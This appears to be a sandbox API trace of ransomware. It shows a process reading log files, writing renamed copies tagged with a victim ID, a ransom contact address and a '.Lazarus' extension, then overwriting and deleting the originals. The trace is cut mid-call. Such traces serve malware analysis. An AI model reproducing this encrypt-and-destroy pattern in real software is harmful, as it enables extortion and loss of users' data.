MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=53 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 53 [0059.778] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0059.779] GetFileType (hFile=0x420) returned 0x1 [0059.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0059.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8b218 [0059.779] GetLastError () returned 0xb7 [0059.780] SetLastError (dwErrCode=0xb7) [0059.780] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0059.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b218 | out: hHeap=0x20000) returned 1 [0059.780] CloseHandle (hObject=0x420) returned 1 [0059.781] AreFileApisANSI () returned 1 [0059.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0059.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0059.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=53 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 53 [0059.781] DeleteFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log")) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d648 | out: hHeap=0x20000) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0059.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.782] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x23, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 1 [0059.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0059.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e500 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0059.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0059.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0059.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0059.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0059.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0059.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0059.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0059.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0059.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0059.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0059.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0059.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0059.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0059.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0059.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0059.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0059.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0059.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e500 [0059.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0059.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0059.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0059.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0059.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0059.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0059.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0059.783] AreFileApisANSI () returned 1 [0059.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", lpUsedDefaultChar=0x0) returned 51 [0059.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0059.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0059.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0059.784] AreFileApisANSI () returned 1 [0059.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0059.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x460b8 [0059.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=51 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 51 [0059.784] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0059.784] GetFileType (hFile=0x420) returned 0x1 [0059.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0059.784] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0059.784] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0059.784] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0059.785] CloseHandle (hObject=0x420) returned 1 [0059.785] AreFileApisANSI () returned 1 [0059.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0059.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46358 [0059.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x46358, cchWideChar=51 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 51 [0059.785] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0059.785] GetFileType (hFile=0x420) returned 0x1 [0059.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0059.785] CloseHandle (hObject=0x420) returned 1 [0059.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0059.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0059.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0059.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0059.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0059.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0059.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0059.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0059.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0059.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0059.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0059.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0059.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0059.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0059.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0059.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0059.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0059.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0059.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0059.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0059.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0059.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0059.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0059.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0059.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0059.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0059.786] AreFileApisANSI () returned 1 [0059.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0059.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46208 [0059.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x46208, cchWideChar=51 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 51 [0059.786] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28)) returned 1 [0059.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0059.786] AreFileApisANSI () returned 1 [0059.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0059.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0059.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0059.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0059.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0059.786] GetLastError () returned 0x0 [0059.787] SetLastError (dwErrCode=0x0) [0059.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e500 [0059.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0059.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x30fc0 [0059.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0059.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0059.787] GetLastError () returned 0x0 [0059.787] SetLastError (dwErrCode=0x0) [0059.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0059.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71960 [0059.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0059.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0059.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0059.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0059.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0059.787] AreFileApisANSI () returned 1 [0059.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 113 [0059.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe2) returned 0x5a6b8 [0059.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=113 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 113 [0059.787] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0059.787] GetFileType (hFile=0x420) returned 0x1 [0059.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0059.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0059.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0059.788] AreFileApisANSI () returned 1 [0059.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0059.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x45ef8 [0059.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x45ef8, cchWideChar=51 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 51 [0059.788] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0059.788] GetFileType (hFile=0x424) returned 0x1 [0059.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45ef8 | out: hHeap=0x20000) returned 1 [0059.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0059.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0059.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.788] GetLastError () returned 0x0 [0059.788] SetLastError (dwErrCode=0x0) [0059.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.788] GetLastError () returned 0x0 [0059.789] SetLastError (dwErrCode=0x0) [0059.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8b218 [0059.789] ReadFile (in: hFile=0x424, lpBuffer=0x8b218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesRead=0x327f030*=0x28, lpOverlapped=0x0) returned 1 [0059.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0059.790] ReadFile (in: hFile=0x424, lpBuffer=0x8b218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0059.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0059.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c220 [0059.790] GetLastError () returned 0x0 [0059.790] SetLastError (dwErrCode=0x0) [0059.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0059.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0059.790] GetLastError () returned 0x0 [0059.790] SetLastError (dwErrCode=0x0) [0059.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0059.790] WriteFile (in: hFile=0x420, lpBuffer=0x8c220*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c220*, lpNumberOfBytesWritten=0x327ef70*=0x30, lpOverlapped=0x0) returned 1 [0059.794] GetLastError () returned 0x0 [0059.794] SetLastError (dwErrCode=0x0) [0059.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0059.794] GetLastError () returned 0x0 [0059.795] SetLastError (dwErrCode=0x0) [0059.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0059.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0059.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0059.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0059.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c220 | out: hHeap=0x20000) returned 1 [0059.795] CloseHandle (hObject=0x420) returned 1 [0059.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b218 | out: hHeap=0x20000) returned 1 [0059.796] CloseHandle (hObject=0x424) returned 1 [0059.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0059.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0059.796] AreFileApisANSI () returned 1 [0059.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0059.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46828 [0059.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x46828, cchWideChar=51 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 51 [0059.796] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 